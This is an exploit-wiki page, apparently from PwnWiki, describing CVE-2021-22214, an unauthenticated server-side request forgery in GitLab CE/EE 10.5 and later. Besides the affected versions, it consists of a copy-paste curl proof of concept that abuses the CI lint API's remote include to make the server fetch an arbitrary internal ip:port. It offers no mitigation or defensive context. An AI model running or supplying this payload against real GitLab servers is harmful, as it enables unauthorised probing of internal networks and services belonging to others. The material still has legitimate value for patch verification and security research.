CVE-2021-22214 GitLab前台SSRF漏洞

From PwnWiki
Revision as of 15:42, 20 June 2021 by Pwnwiki (talk | contribs) (Marked this version for translation)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎中文(台灣)‎

漏洞影響

GitLab CE/EE >=10.5

POC

curl -s --show-error -H 'Content-Type: application/json' https://example.gitlab.com/api/v4/ci/lint --data '{ "include_merged_yaml": true, "content": "include:\n  remote: http://<ip>:<port>/api/v1/targets?test.yml"}'
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2021-22214_GitLab前台SSRF漏洞&oldid=5406"